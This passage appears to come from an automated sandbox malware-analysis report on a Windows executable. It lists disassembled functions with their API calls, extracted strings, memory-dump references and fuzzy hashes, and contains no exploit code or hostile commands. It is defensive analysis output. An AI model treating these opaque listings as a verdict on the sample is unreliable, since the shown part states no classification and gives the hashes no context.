                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                              • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                              • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                              • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                              Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                              • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                                                                              • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                              • String ID:
                                                                              • API String ID: 3771399671-0
                                                                              • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                              • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                              • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                              • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                              Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3413494760-0
                                                                              • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                              • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                              • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                              • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                              Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                              • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                              • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                              • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                              • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                              Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: 0%d$DOWN$OFF
                                                                              • API String ID: 3832890014-468733193
                                                                              • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                              • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                              • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                              • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                              Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                              • VariantClear.OLEAUT32 ref: 0045E970
                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                              • __swprintf.LIBCMT ref: 0045EB1F
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                              Strings
                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 43541914-1568723262
                                                                              • Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                              • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                              • Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                              • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                              Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                              • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DecrementInterlocked$Sleep
                                                                              • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                              • API String ID: 2250217261-3412429629
                                                                              • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                              • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                              • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                              • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                              Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 0-1603158881
                                                                              • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                              • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                              Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00479D1F
                                                                              • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                              • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                              • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 665237470-60002521
                                                                              • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                              • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                              Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                              • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                              Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F317
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                              • IsMenu.USER32(?), ref: 0045F380
                                                                              • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                              • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                              • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID: 0$2
                                                                              • API String ID: 3311875123-3793063076
                                                                              • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                              • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                              Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\r6lOHDg9N9.exe), ref: 0043719E
                                                                              • LoadStringW.USER32(00000000), ref: 004371A7
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                              • LoadStringW.USER32(00000000), ref: 004371C0
                                                                              • _printf.LIBCMT ref: 004371EC
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                              • C:\Users\user\Desktop\r6lOHDg9N9.exe, xrefs: 00437189
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_printf
                                                                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                              • API String ID: 220974073-1043181869
                                                                              • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                              • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                              • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                              • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                              Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                              • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                              • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                              • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                              Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 978794511-0
                                                                              • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                              • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                              • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                              • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                              Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                              • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                              • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                              • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                              Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                              • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                              • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
